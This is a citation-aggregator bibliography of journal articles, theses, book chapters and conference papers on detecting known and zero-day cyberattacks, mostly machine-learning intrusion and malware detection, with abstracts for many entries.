Relevant bibliographies by topics / Known and Zero-Day Attacks Detection

Contents

  1. Journal articles
  2. Dissertations / Theses
  3. Book chapters
  4. Conference papers

Academic literature on the topic 'Known and Zero-Day Attacks Detection'

Author: Grafiati
Published: 16 November 2024

Create a spot-on reference in APA, MLA, Chicago, Harvard, and other styles

Select a source type:

Consult the lists of relevant articles, books, theses, conference reports, and other scholarly sources on the topic 'Known and Zero-Day Attacks Detection.'

Next to every source in the list of references, there is an 'Add to bibliography' button. Press on it, and we will generate automatically the bibliographic reference to the chosen work in the citation style you need: APA, MLA, Harvard, Chicago, Vancouver, etc.

You can also download the full text of the academic publication as pdf and read online its abstract whenever available in the metadata.

Journal articles on the topic "Known and Zero-Day Attacks Detection"

1

Nerella Sameera, M.Siva Jyothi, K.Lakshmaji, and V.S.R.Pavan Kumar. Neeli. "Clustering based Intrusion Detection System for effective Detection of known and Zero-day Attacks." Journal of Advanced Zoology 44, no. 4 (December 2, 2023): 969–75. http://dx.doi.org/10.17762/jaz.v44i4.2423.

Full text
Abstract:
Developing effective security measures is the most challenging task now a days and hence calls for the development of intelligent intrusion detection systems. Most of the existing intrusion detection systems perform best at detecting known attacks but fail to detect zero-day attacks due to the lack of labeled examples. Authors in this paper, comes with a clustering-based IDS framework that can effectively detect both known and zero-day attacks by following unsupervised machine learning techniques. This research uses NSL-KDD dataset for the motive of experimentation and the experimental results exhibit best performance with an accuracy of 78%.
APA, Harvard, Vancouver, ISO, and other styles
2

Hindy, Hanan, Robert Atkinson, Christos Tachtatzis, Jean-Noël Colin, Ethan Bayne, and Xavier Bellekens. "Utilising Deep Learning Techniques for Effective Zero-Day Attack Detection." Electronics 9, no. 10 (October 14, 2020): 1684. http://dx.doi.org/10.3390/electronics9101684.

Full text
Abstract:
Machine Learning (ML) and Deep Learning (DL) have been used for building Intrusion Detection Systems (IDS). The increase in both the number and sheer variety of new cyber-attacks poses a tremendous challenge for IDS solutions that rely on a database of historical attack signatures. Therefore, the industrial pull for robust IDSs that are capable of flagging zero-day attacks is growing. Current outlier-based zero-day detection research suffers from high false-negative rates, thus limiting their practical use and performance. This paper proposes an autoencoder implementation for detecting zero-day attacks. The aim is to build an IDS model with high recall while keeping the miss rate (false-negatives) to an acceptable minimum. Two well-known IDS datasets are used for evaluation—CICIDS2017 and NSL-KDD. In order to demonstrate the efficacy of our model, we compare its results against a One-Class Support Vector Machine (SVM). The manuscript highlights the performance of a One-Class SVM when zero-day attacks are distinctive from normal behaviour. The proposed model benefits greatly from autoencoders encoding-decoding capabilities. The results show that autoencoders are well-suited at detecting complex zero-day attacks. The results demonstrate a zero-day detection accuracy of 89–99% for the NSL-KDD dataset and 75–98% for the CICIDS2017 dataset. Finally, the paper outlines the observed trade-off between recall and fallout.
APA, Harvard, Vancouver, ISO, and other styles
3

Ohtani, Takahiro, Ryo Yamamoto, and Satoshi Ohzahata. "IDAC: Federated Learning-Based Intrusion Detection Using Autonomously Extracted Anomalies in IoT." Sensors 24, no. 10 (May 18, 2024): 3218. http://dx.doi.org/10.3390/s24103218.

Full text
Abstract:
The recent rapid growth in Internet of Things (IoT) technologies is enriching our daily lives but significant information security risks in IoT fields have become apparent. In fact, there have been large-scale botnet attacks that exploit undiscovered vulnerabilities, known as zero-day attacks. Several intrusion detection methods based on network traffic monitoring have been proposed to address this issue. These methods employ federated learning to share learned attack information among multiple IoT networks, aiming to improve collective detection capabilities against attacks including zero-day attacks. Although their ability to detect zero-day attacks with high precision has been confirmed, challenges such as autonomous labeling of attacks from traffic information and attack information sharing between different device types still remain. To resolve the issues, this paper proposes IDAC, a novel intrusion detection method with autonomous attack candidate labeling and federated learning-based attack candidate sharing. The labeling of attack candidates in IDAC is executed using information autonomously extracted from traffic information, and the labeling can also be applied to zero-day attacks. The federated learning-based attack candidate sharing enables candidate aggregation from multiple networks, and it executes attack determination based on the aggregated similar candidates. Performance evaluations demonstrated that IDS with IDAC within networks based on attack candidates is feasible and achieved comparable detection performance against multiple attacks including zero-day attacks compared to the existing methods while suppressing false positives in the extraction of attack candidates. In addition, the sharing of autonomously extracted attack candidates from multiple networks improves both detection performance and the required time for attack detection.
APA, Harvard, Vancouver, ISO, and other styles
4

Hairab, Belal Ibrahim, Heba K. Aslan, Mahmoud Said Elsayed, Anca D. Jurcut, and Marianne A. Azer. "Anomaly Detection of Zero-Day Attacks Based on CNN and Regularization Techniques." Electronics 12, no. 3 (January 23, 2023): 573. http://dx.doi.org/10.3390/electronics12030573.

Full text
Abstract:
The rapid development of cyberattacks in the field of the Internet of things (IoT) introduces new security challenges regarding zero-day attacks. Intrusion-detection systems (IDS) are usually trained on specific attacks to protect the IoT application, but the attacks that are yet unknown for IDS (i.e., zero-day attacks) still represent challenges and concerns regarding users’ data privacy and security in those applications. Anomaly-detection methods usually depend on machine learning (ML)-based methods. Under the ML umbrella are classical ML-based methods, which are known to have low prediction quality and detection rates with regard to data that it has not yet been trained on. DL-based methods, especially convolutional neural networks (CNNs) with regularization methods, address this issue and give a better prediction quality with unknown data and avoid overfitting. In this paper, we evaluate and prove that the CNNs have a better ability to detect zero-day attacks, which are generated from nonbot attackers, compared to classical ML. We use classical ML, normal, and regularized CNN classifiers (L1, and L2 regularized). The training data consists of normal traffic data, and DDoS attack data, as it is the most common attack in the IoT. In order to give the full picture of this evaluation, the testing phase of those classifiers will include two scenarios, each having data with different attack distribution. One of these is the backdoor attack, and the other is the scanning attack. The results of the testing proves that the regularized CNN classifiers still perform better than the classical ML-based methods in detecting zero-day IoT attacks.
APA, Harvard, Vancouver, ISO, and other styles
5

Al-Rushdan, Huthifh, Mohammad Shurman, and Sharhabeel Alnabelsi. "On Detection and Prevention of Zero-Day Attack Using Cuckoo Sandbox in Software-Defined Networks." International Arab Journal of Information Technology 17, no. 4A (July 31, 2020): 662–70. http://dx.doi.org/10.34028/iajit/17/4a/11.

Full text
Abstract:
Networks attacker may identify the network vulnerability within less than one day; this kind of attack is known as zero-day attack. This undiscovered vulnerability by vendors empowers the attacker to affect or damage the network operation, because vendors have less than one day to fix this new exposed vulnerability. The existing defense mechanisms against the zero-day attacks focus on the prevention effort, in which unknown or new vulnerabilities typically cannot be detected. To the best of our knowledge the protection mechanism against zero-day attack is not widely investigated for Software-Defined Networks (SDNs). Thus, in this work we are motivated to develop a new zero-day attack detection and prevention mechanism for SDNs by modifying Cuckoo sandbox tool. The mechanism is implemented and tested under UNIX system. The experiments results show that our proposed mechanism successfully stops the zero-day malwares by isolating the infected clients, in order to prevent the malwares from spreading to other clients. Moreover, results show the effectiveness of our mechanism in terms of detection accuracy and response time
APA, Harvard, Vancouver, ISO, and other styles
6

Alam, Naushad, and Muqeem Ahmed. "Zero-day Network Intrusion Detection using Machine Learning Approach." International Journal on Recent and Innovation Trends in Computing and Communication 11, no. 8s (August 18, 2023): 194–201. http://dx.doi.org/10.17762/ijritcc.v11i8s.7190.

Full text
Abstract:
Zero-day network attacks are a growing global cybersecurity concern. Hackers exploit vulnerabilities in network systems, making network traffic analysis crucial in detecting and mitigating unauthorized attacks. However, inadequate and ineffective network traffic analysis can lead to prolonged network compromises. To address this, machine learning-based zero-day network intrusion detection systems (ZDNIDS) rely on monitoring and collecting relevant information from network traffic data. The selection of pertinent features is essential for optimal ZDNIDS performance given the voluminous nature of network traffic data, characterized by attributes. Unfortunately, current machine learning models utilized in this field exhibit inefficiency in detecting zero-day network attacks, resulting in a high false alarm rate and overall performance degradation. To overcome these limitations, this paper introduces a novel approach combining the anomaly-based extended isolation forest algorithm with the BAT algorithm and Nevergrad. Furthermore, the proposed model was evaluated using 5G network traffic, showcasing its effectiveness in efficiently detecting both known and unknown attacks, thereby reducing false alarms when compared to existing systems. This advancement contributes to improved internet security.
APA, Harvard, Vancouver, ISO, and other styles
7

Bu, Seok-Jun, and Sung-Bae Cho. "Deep Character-Level Anomaly Detection Based on a Convolutional Autoencoder for Zero-Day Phishing URL Detection." Electronics 10, no. 12 (June 21, 2021): 1492. http://dx.doi.org/10.3390/electronics10121492.

Full text
Abstract:
Considering the fatality of phishing attacks, the data-driven approach using massive URL observations has been verified, especially in the field of cyber security. On the other hand, the supervised learning approach relying on known attacks has limitations in terms of robustness against zero-day phishing attacks. Moreover, it is known that it is critical for the phishing detection task to fully exploit the sequential features from the URL characters. Taken together, to ensure both sustainability and intelligibility, we propose the combination of a convolution operation to model the character-level URL features and a deep convolutional autoencoder (CAE) to consider the nature of zero-day attacks. Extensive experiments on three real-world datasets consisting of 222,541 URLs showed the highest performance among the latest deep-learning methods. We demonstrated the superiority of the proposed method by receiver-operating characteristic (ROC) curve analysis in addition to 10-fold cross-validation and confirmed that the sensitivity improved by 3.98% compared to the latest deep model.
APA, Harvard, Vancouver, ISO, and other styles
8

Ali, Shamshair, Saif Ur Rehman, Azhar Imran, Ghazif Adeem, Zafar Iqbal, and Ki-Il Kim. "Comparative Evaluation of AI-Based Techniques for Zero-Day Attacks Detection." Electronics 11, no. 23 (November 28, 2022): 3934. http://dx.doi.org/10.3390/electronics11233934.

Full text
Abstract:
Many intrusion detection and prevention systems (IDPS) have been introduced to identify suspicious activities. However, since attackers are exploiting new vulnerabilities in systems and are employing more sophisticated advanced cyber-attacks, these zero-day attacks remain hidden from IDPS in most cases. These features have incentivized many researchers to propose different artificial intelligence-based techniques to prevent, detect, and respond to such advanced attacks. This has also created a new requirement for a comprehensive comparison of the existing schemes in several aspects ; after a thorough study we found that there currently exists no detailed comparative analysis of artificial intelligence-based techniques published in the last five years. Therefore, there is a need for this kind of work to be published, as there are many comparative analyses in other fields of cyber security that are available for readers to review.In this paper, we provide a comprehensive review of the latest and most recent literature, which introduces well-known machine learning and deep learning algorithms and the challenges they face in detecting zero-day attacks. Following these qualitative analyses, we present the comparative evaluation results regarding the highest accuracy, precision, recall, and F1 score compared to different datasets.
APA, Harvard, Vancouver, ISO, and other styles
9

Rodríguez, Eva, Pol Valls, Beatriz Otero, Juan José Costa, Javier Verdú, Manuel Alejandro Pajuelo, and Ramon Canal. "Transfer-Learning-Based Intrusion Detection Framework in IoT Networks." Sensors 22, no. 15 (July 27, 2022): 5621. http://dx.doi.org/10.3390/s22155621.

Full text
Abstract:
Cyberattacks in the Internet of Things (IoT) are growing exponentially, especially zero-day attacks mostly driven by security weaknesses on IoT networks. Traditional intrusion detection systems (IDSs) adopted machine learning (ML), especially deep Learning (DL), to improve the detection of cyberattacks. DL-based IDSs require balanced datasets with large amounts of labeled data; however, there is a lack of such large collections in IoT networks. This paper proposes an efficient intrusion detection framework based on transfer learning (TL), knowledge transfer, and model refinement, for the effective detection of zero-day attacks. The framework is tailored to 5G IoT scenarios with unbalanced and scarce labeled datasets. The TL model is based on convolutional neural networks (CNNs). The framework was evaluated to detect a wide range of zero-day attacks. To this end, three specialized datasets were created. Experimental results show that the proposed TL-based framework achieves high accuracy and low false prediction rate (FPR). The proposed solution has better detection rates for the different families of known and zero-day attacks than any previous DL-based IDS. These results demonstrate that TL is effective in the detection of cyberattacks in IoT environments.
APA, Harvard, Vancouver, ISO, and other styles
10

Sheikh, Zakir Ahmad, Yashwant Singh, Pradeep Kumar Singh, and Paulo J. Sequeira Gonçalves. "Defending the Defender: Adversarial Learning Based Defending Strategy for Learning Based Security Methods in Cyber-Physical Systems (CPS)." Sensors 23, no. 12 (June 9, 2023): 5459. http://dx.doi.org/10.3390/s23125459.

Full text
Abstract:
Cyber-Physical Systems (CPS) are prone to many security exploitations due to a greater attack surface being introduced by their cyber component by the nature of their remote accessibility or non-isolated capability. Security exploitations, on the other hand, rise in complexities, aiming for more powerful attacks and evasion from detections. The real-world applicability of CPS thus poses a question mark due to security infringements. Researchers have been developing new and robust techniques to enhance the security of these systems. Many techniques and security aspects are being considered to build robust security systems; these include attack prevention, attack detection, and attack mitigation as security development techniques with consideration of confidentiality, integrity, and availability as some of the important security aspects. In this paper, we have proposed machine learning-based intelligent attack detection strategies which have evolved as a result of failures in traditional signature-based techniques to detect zero-day attacks and attacks of a complex nature. Many researchers have evaluated the feasibility of learning models in the security domain and pointed out their capability to detect known as well as unknown attacks (zero-day attacks). However, these learning models are also vulnerable to adversarial attacks like poisoning attacks, evasion attacks, and exploration attacks. To make use of a robust-cum-intelligent security mechanism, we have proposed an adversarial learning-based defense strategy for the security of CPS to ensure CPS security and invoke resilience against adversarial attacks. We have evaluated the proposed strategy through the implementation of Random Forest (RF), Artificial Neural Network (ANN), and Long Short-Term Memory (LSTM) on the ToN_IoT Network dataset and an adversarial dataset generated through the Generative Adversarial Network (GAN) model.
APA, Harvard, Vancouver, ISO, and other styles
More sources

Dissertations / Theses on the topic "Known and Zero-Day Attacks Detection"

1

Toure, Almamy. "Collection, analysis and harnessing of communication flows for cyber-attack detection." Electronic Thesis or Diss., Valenciennes, Université Polytechnique Hauts-de-France, 2024. http://www.theses.fr/2024UPHF0023.

Full text
Abstract:
La complexité croissante des cyberattaques, caractérisée par une diversification des techniques d'attaque, une expansion des surfaces d'attaque et une interconnexion croissante d'applications avec Internet, rend impérative la gestion du trafic réseau en milieu professionnel. Les entreprises de tous types collectent et analysent les flux réseau et les journaux de logs pour assurer la sécurité des données échangées et prévenir la compromission des systèmes d'information. Cependant, les techniques de collecte et de traitement des données du trafic réseau varient d'un jeu de données à l'autre, et les approches statiques de détection d'attaque présentent des limites d'efficacité et précision, de temps d'exécution et de scalabilité. Cette thèse propose des approches dynamiques de détection de cyberattaques liées au trafic réseau, en utilisant une ingénierie d'attributs basée sur les différentes phases de communication d'un flux réseau, couplée aux réseaux de neurones à convolution (1D-CNN) et leur feature detector. Cette double extraction permet ainsi une meilleure classification des flux réseau, une réduction du nombre d'attributs et des temps d'exécution des modèles donc une détection efficace des attaques. Les entreprises sont également confrontées à des cybermenaces qui évoluent constamment, et les attaques "zero-day", exploitant des vulnérabilités encore inconnues, deviennent de plus en plus fréquentes. La détection de ces attaques zero-day implique une veille technologique constante et une analyse minutieuse, mais coûteuse en temps, de l'exploitation de ces failles. Les solutions proposées garantissent pour la plupart la détection de certaines techniques d'attaque. Ainsi, nous proposons un framework de détection de ces attaques qui traite toute la chaîne d'attaque, de la phase de collecte des données à l'identification de tout type de zero-day, même dans un environnement en constante évolution. Enfin, face à l'obsolescence des jeux de données et techniques de génération de données existants pour la détection d'intrusion et à la nature figée, non évolutive, et non exhaustive des scénarios d'attaques récents, l'étude d'un générateur de données de synthèse adapté tout en garantissant la confidentialité des données est abordée. Les solutions proposées dans cette thèse optimisent la détection des techniques d'attaque connues et zero-day sur les flux réseau, améliorent la précision des modèles, tout en garantissant la confidentialité et la haute disponibilité des données et modèles avec une attention particulière sur l'applicabilité des solutions dans un réseau d'entreprise
The increasing complexity of cyberattacks, characterized by a diversification of attack techniques, an expansion of attack surfaces, and growing interconnectivity of applications with the Internet, makes network traffic management in a professional environment imperative. Companies of all types collect and analyze network flows and logs to ensure the security of exchanged data and prevent the compromise of information systems. However, techniques for collecting and processing network traffic data vary from one dataset to another, and static attack detection approaches have limitations in terms of efficiency and precision, execution time, and scalability. This thesis proposes dynamic approaches for detecting cyberattacks related to network traffic, using feature engineering based on the different communication phases of a network flow, coupled with convolutional neural networks (1D-CNN) and their feature detector. This double extraction allows for better classification of network flows, a reduction in the number of attributes and model execution times, and thus effective attack detection. Companies also face constantly evolving cyber threats, and "zero-day" attacks that exploit previously unknown vulnerabilities are becoming increasingly frequent. Detecting these zero-day attacks requires constant technological monitoring and thorough but time-consuming analysis of the exploitation of these vulnerabilities. The proposed solutions guarantee the detection of certain attack techniques. Therefore, we propose a detection framework for these attacks that covers the entire attack chain, from the data collection phase to the identification of any type of zero-day, even in a constantly evolving environment. Finally, given the obsolescence of existing datasets and data generation techniques for intrusion detection, and the fixed, non-evolving, and non-exhaustive nature of recent attack scenarios, the study of an adapted synthetic data generator while ensuring data confidentiality is addressed. The solutions proposed in this thesis optimize the detection of known and zero-day attack techniques on network flows, improve the accuracy of models, while ensuring the confidentiality and high availability of data and models, with particular attention to the applicability of the solutions in a company network
APA, Harvard, Vancouver, ISO, and other styles
2

Khraisat, Ansam. "Intelligent zero-day intrusion detection framework for internet of things." Thesis, Federation University Australia, 2020. http://researchonline.federation.edu.au/vital/access/HandleResolver/1959.17/179729.

Full text
Abstract:
Zero-day intrusion detection system faces serious challenges as hundreds of thousands of new instances of malware are being created every day to cause harm or damage to the computer system. Cyber-attacks are becoming more sophisticated, leading to challenges in intrusion detection. There are many Intrusion Detection Systems (IDSs), which are proposed to identify abnormal activities, but most of these IDSs produce a large number of false positives and low detection accuracy. Hence, a significant quantity of false positives could generate a high-level of alerts in a short period of time as the normal activities are classified as intrusion activities. This thesis proposes a novel framework of hybrid intrusion detection system that integrates the Signature Intrusion Detection System (SIDS) with the Anomaly Intrusion Detection System (AIDS) to detect zero-day attacks with high accuracy. SIDS has been used to identify previously known intrusions, and AIDS has been applied to detect unknown zero-day intrusions. The goal of this research is to combine the strengths of each technique toward the development of a hybrid framework for the efficient intrusion detection system. A number of performance measures including accuracy, F-measure and area under ROC curve have been used to evaluate the efficacy of our proposed models and to compare and contrast with existing approaches. Extensive simulation results conducted in this thesis show that the proposed framework is capable of yielding excellent detection performance when tested with a number of widely used benchmark datasets in the intrusion detection system domain. Experiments show that the proposed hybrid IDS provides higher detection rate and lower false-positive rate in detecting intrusions as compared to the SIDS and AIDS techniques individually.
Doctor of Philosophy
APA, Harvard, Vancouver, ISO, and other styles
3

Peddisetty, Naga Raju. "State-of-the-art Intrusion Detection: Technology, Challenges, and Evaluation." Thesis, Linköping University, Department of Electrical Engineering, 2005. http://urn.kb.se/resolve?urn=urn:nbn:se:liu:diva-2792.

Full text
Abstract:

Due to the invention of automated hacking tools, Hacking is not a black art anymore. Even script kiddies can launch attacks in few seconds. Therefore, there is a great emphasize on the Security to protect the resources from camouflage. Intrusion Detection System is also one weapon in the security arsenal. It is the process of monitoring and analyzing information sources in order to detect vicious traffic. With its unique capabilities like monitoring, analyzing, detecting and archiving, IDS assists the organizations to combat against threats, to have a snap-shot of the networks, and to conduct Forensic Analysis. Unfortunately there are myriad products inthe market. Selecting a right product at time is difficult. Due to the wide spread rumors and paranoia, in this work I have presented the state-of-the-art IDS technologies, assessed the products, and evaluated. I have also presented some of the novel challenges that IDS products are suffering. This work will be a great help for pursuing IDS technology and to deploy Intrusion Detection Systems in an organization. It also gives in-depth knowledge of the present IDS challenges.

APA, Harvard, Vancouver, ISO, and other styles

Book chapters on the topic "Known and Zero-Day Attacks Detection"

1

Wang, Lingyu, Mengyuan Zhang, and Anoop Singhal. "Network Security Metrics: From Known Vulnerabilities to Zero Day Attacks." In Lecture Notes in Computer Science, 450–69. Cham: Springer International Publishing, 2018. http://dx.doi.org/10.1007/978-3-030-04834-1_22.

Full text
APA, Harvard, Vancouver, ISO, and other styles
2

Hamid, Khalid, Muhammad Waseem Iqbal, Muhammad Aqeel, Xiangyong Liu, and Muhammad Arif. "Analysis of Techniques for Detection and Removal of Zero-Day Attacks (ZDA)." In Communications in Computer and Information Science, 248–62. Singapore: Springer Nature Singapore, 2023. http://dx.doi.org/10.1007/978-981-99-0272-9_17.

Full text
APA, Harvard, Vancouver, ISO, and other styles
3

Ngo, Quoc-Dung, and Quoc-Huu Nguyen. "A Reinforcement Learning-Based Approach for Detection Zero-Day Malware Attacks on IoT System." In Artificial Intelligence Trends in Systems, 381–94. Cham: Springer International Publishing, 2022. http://dx.doi.org/10.1007/978-3-031-09076-9_34.

Full text
APA, Harvard, Vancouver, ISO, and other styles
4

Singh, Mahendra Pratap, Virendra Pratap Singh, and Maanak Gupta. "Early Detection and Classification of Zero-Day Attacks in Network Traffic Using Convolutional Neural Network." In Lecture Notes in Networks and Systems, 812–22. Cham: Springer Nature Switzerland, 2024. http://dx.doi.org/10.1007/978-3-031-60935-0_70.

Full text
APA, Harvard, Vancouver, ISO, and other styles
5

Jorquera Valero, José María, Manuel Gil Pérez, Alberto Huertas Celdrán, and Gregorio Martínez Pérez. "Identification and Classification of Cyber Threats Through SSH Honeypot Systems." In Handbook of Research on Intrusion Detection Systems, 105–29. IGI Global, 2020. http://dx.doi.org/10.4018/978-1-7998-2242-4.ch006.

Full text
Abstract:
As the number and sophistication of cyber threats increases year after year, security systems such as antivirus, firewalls, or Intrusion Detection Systems based on misuse detection techniques are improved in detection capabilities. However, these traditional systems are usually limited to detect potential threats, since they are inadequate to spot zero-day attacks or mutations in behaviour. Authors propose using honeypot systems as a further security layer able to provide an intelligence holistic level in detecting unknown threats, or well-known attacks with new behaviour patterns. Since brute-force attacks are increasing in recent years, authors opted for an SSH medium-interaction honeypot to acquire a log set from attacker's interactions. The proposed system is able to acquire behaviour patterns of each attacker and link them with future sessions for early detection. Authors also generate a feature set to feed Machine Learning algorithms with the main goal of identifying and classifying attacker's sessions, and thus be able to learn malicious intentions in executing cyber threats.
APA, Harvard, Vancouver, ISO, and other styles
6

Roseline, S. Abijah, and S. Geetha. "Intelligent Malware Detection Using Deep Dilated Residual Networks for Cyber Security." In Countering Cyber Attacks and Preserving the Integrity and Availability of Critical Systems, 211–29. IGI Global, 2019. http://dx.doi.org/10.4018/978-1-5225-8241-0.ch011.

Full text
Abstract:
Malware is the most serious security threat, which possibly targets billions of devices like personal computers, smartphones, etc. across the world. Malware classification and detection is a challenging task due to the targeted, zero-day, and stealthy nature of advanced and new malwares. The traditional signature detection methods like antivirus software were effective for detecting known malwares. At present, there are various solutions for detection of such unknown malwares employing feature-based machine learning algorithms. Machine learning techniques detect known malwares effectively but are not optimal and show a low accuracy rate for unknown malwares. This chapter explores a novel deep learning model called deep dilated residual network model for malware image classification. The proposed model showed a higher accuracy of 98.50% and 99.14% on Kaggle Malimg and BIG 2015 datasets, respectively. The new malwares can be handled in real-time with minimal human interaction using the proposed deep residual model.
APA, Harvard, Vancouver, ISO, and other styles
7

Thapa, Vidhanth Maan, Sudhanshu Srivastava, and Shelly Garg. "Zero Day Vulnerabilities Assessments, Exploits Detection, and Various Design Patterns in Cyber Software." In AI Tools for Protecting and Preventing Sophisticated Cyber Attacks, 132–47. IGI Global, 2023. http://dx.doi.org/10.4018/978-1-6684-7110-4.ch006.

Full text
Abstract:
In this technology-driven era, software development and maintenance is a rapidly growing domain and is predestined to thrive over the coming decade. But the growing demand for software solutions also brings its own implications. Software vulnerabilities are the most crucial of these. Software Vulnerabilities can be referred to as weaknesses or shortcomings of the software solutions which increase the risks of exploitation of resources and information. In the past few years, the number of exploits has been increasing rapidly, reaching an all-time high in 2021 affecting more than 100 million people worldwide. Although, even with the presence of existing vulnerability management models and highly secure tools and frameworks, software vulnerabilities are harder to identify and resolve as they may not be independent, and resolving them may cause other vulnerabilities. Moreover, a majority of the exploit are caused due to known vulnerabilities and zero-day vulnerabilities..
APA, Harvard, Vancouver, ISO, and other styles
8

Sethuraman, Murugan Sethuraman. "Survey of Unknown Malware Attack Finding." In Advances in Systems Analysis, Software Engineering, and High Performance Computing, 260–76. IGI Global, 2018. http://dx.doi.org/10.4018/978-1-5225-3129-6.ch011.

Full text
Abstract:
Intrusion detection system(IDS) has played a vital role as a device to guard our networks from unknown malware attacks. However, since it still suffers from detecting an unknown attack, i.e., 0-day attack, the ultimate challenge in intrusion detection field is how we can precisely identify such an attack. This chapter will analyze the various unknown malware activities while networking, internet or remote connection. For identifying known malware various tools are available but that does not detect Unknown malware exactly. It will vary according to connectivity and using tools and finding strategies what they used. Anyhow like known Malware few of unknown malware listed according to their abnormal activities and changes in the system. In this chapter, we will see the various Unknown methods and avoiding preventions as birds eye view manner.
APA, Harvard, Vancouver, ISO, and other styles
9

Sethuraman, Murugan Sethuraman. "Survey of Unknown Malware Attack Finding." In Intelligent Systems, 2227–43. IGI Global, 2018. http://dx.doi.org/10.4018/978-1-5225-5643-5.ch099.

Full text
Abstract:
Intrusion detection system(IDS) has played a vital role as a device to guard our networks from unknown malware attacks. However, since it still suffers from detecting an unknown attack, i.e., 0-day attack, the ultimate challenge in intrusion detection field is how we can precisely identify such an attack. This chapter will analyze the various unknown malware activities while networking, internet or remote connection. For identifying known malware various tools are available but that does not detect Unknown malware exactly. It will vary according to connectivity and using tools and finding strategies what they used. Anyhow like known Malware few of unknown malware listed according to their abnormal activities and changes in the system. In this chapter, we will see the various Unknown methods and avoiding preventions as birds eye view manner.
APA, Harvard, Vancouver, ISO, and other styles
10

Stewart, Andrew J. "Vulnerability Disclosure, Bounties, and Markets." In A Vulnerable System, 127–51. Cornell University Press, 2021. http://dx.doi.org/10.7591/cornell/9781501758942.003.0008.

Full text
Abstract:
This chapter focuses on the obsession with technical security vulnerabilities at the beginning of the twenty-first century. A vulnerability that is not common knowledge and for which no patch has yet been released is referred to as a zero-day vulnerability. The term zero-day refers to the fact that there have been zero-days' advance warning, meaning no days, regarding the risk that the security vulnerability represents. Security technologies such as intrusion detection systems and antivirus software normally try to detect known patterns of attack and so typically would be unlikely to detect the use of a zero-day vulnerability. The chapter then looks at stunt hacking, which was portrayed as a way to draw attention to dangerous vulnerabilities. What went unsaid was that stunt hacking was a means by which hackers and commercial security companies could promote themselves and their technical skill sets.
APA, Harvard, Vancouver, ISO, and other styles

Conference papers on the topic "Known and Zero-Day Attacks Detection"

1

Wang, Shen, Zhengzhang Chen, Xiao Yu, Ding Li, Jingchao Ni, Lu-An Tang, Jiaping Gui, Zhichun Li, Haifeng Chen, and Philip S. Yu. "Heterogeneous Graph Matching Networks for Unknown Malware Detection." In Twenty-Eighth International Joint Conference on Artificial Intelligence {IJCAI-19}. California: International Joint Conferences on Artificial Intelligence Organization, 2019. http://dx.doi.org/10.24963/ijcai.2019/522.

Full text
Abstract:
Information systems have widely been the target of malware attacks. Traditional signature-based malicious program detection algorithms can only detect known malware and are prone to evasion techniques such as binary obfuscation, while behavior-based approaches highly rely on the malware training samples and incur prohibitively high training cost. To address the limitations of existing techniques, we propose MatchGNet, a heterogeneous Graph Matching Network model to learn the graph representation and similarity metric simultaneously based on the invariant graph modeling of the program's execution behaviors. We conduct a systematic evaluation of our model and show that it is accurate in detecting malicious program behavior and can help detect malware attacks with less false positives. MatchGNet outperforms the state-of-the-art algorithms in malware detection by generating 50% less false positives while keeping zero false negatives.
APA, Harvard, Vancouver, ISO, and other styles
2

Sejr, Jonas Herskind, Arthur Zimek, and Peter Schneider-Kamp. "Explainable Detection of Zero Day Web Attacks." In 2020 3rd International Conference on Data Intelligence and Security (ICDIS). IEEE, 2020. http://dx.doi.org/10.1109/icdis50059.2020.00016.

Full text
APA, Harvard, Vancouver, ISO, and other styles
3

Reardon, Shay, Murtadha D. Hssayeni, and Imadeldin Mahgoub. "Detection of Zero-Day Attacks on IoT." In 2024 International Conference on Smart Applications, Communications and Networking (SmartNets). IEEE, 2024. http://dx.doi.org/10.1109/smartnets61466.2024.10577735.

Full text
APA, Harvard, Vancouver, ISO, and other styles
4

AlEroud, Ahmed, and George Karabatis. "A Contextual Anomaly Detection Approach to Discover Zero-Day Attacks." In 2012 International Conference on Cyber Security (CyberSecurity). IEEE, 2012. http://dx.doi.org/10.1109/cybersecurity.2012.12.

Full text
APA, Harvard, Vancouver, ISO, and other styles
5

Gao, Xueqin, Kai Chen, Yufei Zhao, Peng Zhang, Longxi Han, and Daojuan Zhang. "A Zero-Shot Learning-Based Detection Model Against Zero-Day Attacks in IoT." In 2024 9th International Conference on Electronic Technology and Information Science (ICETIS). IEEE, 2024. http://dx.doi.org/10.1109/icetis61828.2024.10593684.

Full text
APA, Harvard, Vancouver, ISO, and other styles
6

Sandescu, Cristian, Razvan Rughinis, and Octavian Grigorescu. "HUNT : USING HONEYTOKENS TO UNDERSTAND AND INFLUENCE THE EXECUTION OF AN ATTACK." In eLSE 2017. Carol I National Defence University Publishing House, 2017. http://dx.doi.org/10.12753/2066-026x-17-075.

Full text
Abstract:
World wide data infrastructure has increased in dimension and complexity due to consolidation, centralization and virtualization trends during the last 10 years. Being able to discriminate quickly between large-scale non-directional attacks and targeted APT (advanced persistent threats) or between script kiddies and experienced hackers is key for protecting critical IT infrastructures. While the first case can be easily handled by existing solutions, the latter raises significant challenges. Implementing honeytokens and honeypots is an extremely efficient intrusion detection system based on setting traps for hackers by deliberately placing enticing resources within existing environments. Previous research has used honeypots to understand hacking TTPs (tactics, techniques and procedures) and to generate more realistic honeytokens. In this paper we build on existing results to quickly categorize attacks, map the attacker persona and focus on targeted attacks. We influence the execution flow by trapping the attackers into a maze with three purposes. The first aim consists in distracting them from the real data and understanding their motivation; this is done by placing low hanging fruits in his path. The second aim refers to getting to know the attackers, gathering forensic evidence and using this information to adapt incident response. The last goal is the most difficult: to completely remove the threat by revealing the attackers' identity, getting in contact, handing them over to law enforcement agencies, or deterring them. We deploy a series of interconnected honeytokens, working together as a whole. Each honeytoken will have an exploitation difficulty in order to map out the attacker's skills and will lead to the next honeytoken, thus forming a real-world hacking scenario. We are also analysing the possibility of deploying dynamic traps based on how the attack develops in real time. From a technical perspective we propose a zero-touch approach for existing environments, by deploying the honeytokens as a service in the cloud, with minimum overhead for the customer.
APA, Harvard, Vancouver, ISO, and other styles
7

Radhakrishnan, Kiran, Rajeev R. Menon, and Hiran V. Nath. "A survey of zero-day malware attacks and its detection methodology." In TENCON 2019 - 2019 IEEE Region 10 Conference (TENCON). IEEE, 2019. http://dx.doi.org/10.1109/tencon.2019.8929620.

Full text
APA, Harvard, Vancouver, ISO, and other styles
8

Regi, Suraj, Ginni Arora, Raga Gangadharan, Ruchika Bathla, and Nitin Pandey. "Case Study on Detection and Prevention Methods in Zero Day Attacks." In 2022 10th International Conference on Reliability, Infocom Technologies and Optimization (Trends and Future Directions) (ICRITO). IEEE, 2022. http://dx.doi.org/10.1109/icrito56286.2022.9964873.

Full text
APA, Harvard, Vancouver, ISO, and other styles
9

